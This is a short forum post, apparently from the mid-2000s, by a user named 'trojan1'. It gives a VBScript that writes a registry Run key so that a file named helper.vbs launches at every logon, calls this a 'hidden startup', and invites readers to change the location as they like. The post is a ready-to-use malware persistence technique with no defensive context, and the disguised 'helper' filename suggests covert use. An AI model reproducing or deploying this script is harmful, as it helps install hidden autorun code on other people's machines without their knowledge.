| |
trojan1
Posts: 2
Score: 0
Joined: 12/7/2004
From:
Status: offline
|
Dim WSHShell On Error Resume Next set WSHShell = wscript.createobject("wscript.shell") root = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" key = "helper.vbs" valueX = "c:\windows\helper.vbs" WshShell.RegWrite Root & Key, ValueX, "REG_SZ" this is the location for the "hidden startup". but change as you please... TR
|
|